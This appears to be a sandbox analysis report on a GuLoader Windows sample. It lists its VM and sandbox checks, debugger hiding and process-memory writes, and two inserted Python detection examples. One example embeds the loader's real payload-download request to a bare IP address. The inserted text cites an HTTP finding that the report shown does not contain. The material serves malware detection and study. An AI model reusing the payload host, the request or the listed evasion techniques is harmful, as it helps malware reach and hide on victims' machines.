                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,
                        Source: GR8jRQeRUr.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040755C
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_00406D85
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_72E41BFF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294663A
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947BC0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294AF3F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294708D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029402A2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02946CE3
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02949414
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947219
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294700B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294607E
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02946A7B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029479D2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029479C2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029471F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029469EB
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947154
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294A152
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294637F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02949F6F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000644F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000609C0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00064A30
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00062A48
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00065BA0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00069E50
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0006E5C9
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00064D60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000A612F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000A6B00
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000AED60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000A7170
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000A97F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000A9808
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00105C58
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00107FB8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0010B01F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294663A NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294AA46 LoadLibraryA,NtProtectVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947BC0 NtAllocateVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294708D NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029402A2 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02946CE3 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947219 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294700B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294723B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294607E NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02946A7B NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029471F8 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029469EB NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02947154 NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294637F NtWriteVirtualMemory,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Process Stats: CPU usage > 98%
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp | Binary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe | Static PE information: invalid certificate
                        Source: GR8jRQeRUr.exe | Virustotal: Detection: 13%
                        Source: GR8jRQeRUr.exe | ReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File read: C:\Users\user\Desktop\GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown | Process created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Process created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Process created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File created: C:\Users\user\AppData\Local\Yandex
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File created: C:\Users\user\AppData\Local\Temp\nstAA59.tmp
                        Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_004021AA CoCreateInstance,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: GR8jRQeRUr.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp
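The "HTTP traffic detected" finding above (GET /RamzersStubed.bin from 185.112.83.8, with the same Trident/7.0 User-Agent the report later recovers from the loader's memory next to the wininet.dll string) is the loader fetching its next stage. The following Python is an added example, not part of this report and not the sandbox's own detection logic: it parses a raw request and lists the traits that make this download stand out from browser traffic. The request text is constructed from the finding above; the indicator set and the threshold of three are my own choices, not values from the report.

```python
"""Triage of a captured HTTP request against the GuLoader stage-download
pattern in this report.  Added example, not part of the sandbox report or
its detection logic.  The request text is constructed from the report's
'HTTP traffic detected' finding; the indicator set and the threshold are
my own choices."""
import ipaddress
from urllib.parse import urlsplit

# Constructed from the report: the request the sample sent for its payload.
SAMPLE_REQUEST = (
    "GET /RamzersStubed.bin HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\r\n"
    "Host: 185.112.83.8\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)

# The User-Agent the report recovers from the loader's memory (next to the
# wininet.dll import string), so the same string can be matched on the wire.
GULOADER_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"

# Headers a browser sends with a navigation that this request lacks.
BROWSER_HEADERS = {"accept", "accept-language", "accept-encoding"}


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, path, version and a
    lower-cased header dict."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "version": version, "headers": headers}


def loader_download_indicators(raw):
    """Reasons a request resembles the stage download seen in the report.
    Each is weak alone; the combination is what a rule should key on."""
    req = parse_request(raw)
    hdr = req["headers"]
    reasons = []

    host = hdr.get("host", "").split(":")[0]
    try:
        ipaddress.ip_address(host)
        reasons.append("host is a bare IP literal")
    except ValueError:
        pass

    if req["method"] == "GET" and urlsplit(req["path"]).path.lower().endswith(".bin"):
        reasons.append("GET of a .bin resource")

    if hdr.get("user-agent") == GULOADER_UA:
        reasons.append("User-Agent matches the string embedded in GuLoader")

    if not BROWSER_HEADERS & set(hdr):
        reasons.append("no Accept/Accept-Language/Accept-Encoding headers")

    if hdr.get("cache-control", "").lower() == "no-cache" and "referer" not in hdr:
        reasons.append("Cache-Control: no-cache without a Referer")

    return reasons


def is_suspicious(raw, threshold=3):
    """True when at least `threshold` indicators fire (3 is my choice)."""
    return len(loader_download_indicators(raw)) >= threshold


if __name__ == "__main__":
    for reason in loader_download_indicators(SAMPLE_REQUEST):
        print("-", reason)
```

Run stand-alone it prints all five reasons for the report's request. The User-Agent match is the strongest single trait, since the string is hardcoded in the loader's memory rather than taken from the victim's browser, but a bare-IP host plus a .bin GET with no Accept headers is a useful fallback when the next build changes the UA.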

                        Data Obfuscation:

                        Yara detected GuLoader
                        Source: Yara match | File source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_72E430C0 push eax; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02944E91 push ss; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029438A6 push cs; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02945C10 push ds; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294080B push cs; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0294027C push ds; iretw
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_02940263 push ds; iretw
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029407F2 push cs; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_029423EE push ebx; retf
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0006B530 push esp; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000AD4D0 push cs; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_000AF950 push eax; iretd
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0010099C push 418B000Dh; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0012A721 push ds; ret
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File created: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dll
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Process information set: NOOPENFILEERRORBOX (reported 83 times)
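The push/ret pairs listed above are what the "code obfuscation (call, push, ret)" signature in the overview keys on. Most of the hits sit in the 0x02940000 region that the GuLoader Yara rule also matched, and a segment push followed by iretd is not something a compiler emits, so these can as easily be bytes of packed payload that happen to decode as instructions as deliberate obfuscation. The following Python is an added example and not the sandbox's implementation: it reproduces the heuristic over a byte buffer, constructed here so that it contains several of the exact pairs reported (push cs; ret, push ds; iretw, push 418B000Dh; ret, push esp; iretd), and computes the expected rate of accidental hits on random data so a reader can judge how much weight the finding deserves on its own.

```python
"""Scanner for the push/ret pairs the report lists under Data Obfuscation.
Added example, not the sandbox's implementation.  The byte buffer below is
constructed to contain several of the pairs the report found."""

# Single-byte push opcodes valid in 32-bit mode.
PUSH_OPCODES = {
    0x06: "push es", 0x0E: "push cs", 0x16: "push ss", 0x1E: "push ds",
    0x50: "push eax", 0x51: "push ecx", 0x52: "push edx", 0x53: "push ebx",
    0x54: "push esp", 0x55: "push ebp", 0x56: "push esi", 0x57: "push edi",
}
# Return-family opcodes; 66 CF (iretw) is handled separately below.
RET_OPCODES = {0xC3: "ret", 0xCB: "retf", 0xCF: "iretd"}


def _match_ret(buf, j):
    """Return (mnemonic, end) if a ret/retf/iretd/iretw starts at buf[j]."""
    if j < len(buf) and buf[j] in RET_OPCODES:
        return RET_OPCODES[buf[j]], j + 1
    if j + 1 < len(buf) and buf[j] == 0x66 and buf[j + 1] == 0xCF:
        return "iretw", j + 2
    return None, j


def scan_push_ret(buf):
    """Return (offset, 'push X; ret') for every push immediately followed
    by a return, covering single-byte pushes and push imm32 (68 xx xx xx xx)."""
    hits = []
    i, n = 0, len(buf)
    while i < n:
        b = buf[i]
        if b in PUSH_OPCODES:
            push_txt, nxt = PUSH_OPCODES[b], i + 1
        elif b == 0x68 and i + 5 <= n:
            imm = int.from_bytes(buf[i + 1:i + 5], "little")
            push_txt, nxt = f"push {imm:08X}h", i + 5
        else:
            i += 1
            continue
        ret_txt, end = _match_ret(buf, nxt)
        if ret_txt:
            hits.append((i, f"{push_txt}; {ret_txt}"))
            i = end
        else:
            i += 1
    return hits


def expected_random_hits(size):
    """Expected single-byte-push + ret/retf/iretd pairs in `size` bytes of
    uniformly random data: 12 push opcodes x 3 return opcodes out of 65536
    possible byte pairs, i.e. about 36 per 64 KiB with no code present."""
    return size * 12 * 3 / 65536


# Constructed buffer reproducing findings from the report.
SAMPLE = bytes([
    0x90, 0x90,
    0x0E, 0xC3,                          # push cs; ret        (cf. 0_2_029438A6)
    0x1E, 0x66, 0xCF,                    # push ds; iretw      (cf. 0_2_0294027C)
    0x68, 0x0D, 0x00, 0x8B, 0x41, 0xC3,  # push 418B000Dh; ret (cf. 15_2_0010099C)
    0x54, 0xCF,                          # push esp; iretd     (cf. 15_2_0006B530)
    0xAA,
])

if __name__ == "__main__":
    for offset, text in scan_push_ret(SAMPLE):
        print(f"{offset:#06x}: {text}")
```

Because roughly 36 such pairs are expected in every 64 KiB of random bytes, a handful of hits inside a writable, Yara-matched region says little by itself; the same pairs found in the mapped .text section of a signed binary would be far more interesting. The finding is better read alongside the NtAllocateVirtualMemory / NtWriteVirtualMemory / NtProtectVirtualMemory calls reported for the same 0x0294xxxx functions, which are the actual unpacking activity.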

                        Malware Analysis System Evasion:

                        Tries to detect Any.run
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File opened: C:\Program Files\qga\qga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | File opened: C:\Program Files\qga\qga.exe
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmp | Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 6424 | Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe TID: 3176 | Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Last function: Thread delayed
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Window / User API: threadDelayed 527
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Window / User API: threadDelayed 2405
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 15_2_0012B028 sldt word ptr [eax]
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_00406873 FindFirstFileW,FindClose,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040290B FindFirstFileW,
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | System information queried: ModuleInformation
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmp | Binary or memory string: VMware
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587073921.0000000000979000.00000004.00000020.sdmp | Binary or memory string: Win32_VideoController(Standard display types)VMwareEGOO3369Win32_VideoController_T9WFHGGVideoController120060621000000.000000-0004.724058display.infMSBDADA6EFYGRPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsE5VS2XYCl
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmp | Binary or memory string: vmicshutdown
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicvss
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587048785.0000000000956000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587037416.000000000094B000.00000004.00000020.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405605442.0000000002A40000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
                        Source: GR8jRQeRUr.exe, 00000000.00000002.405703001.000000000432A000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.587218557.000000000250A000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Code function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Code function: 0_2_0294782B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Code function: 0_2_0294907F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe Code function: 0_2_0294951D mov eax, dword ptr fs:[00000030h]
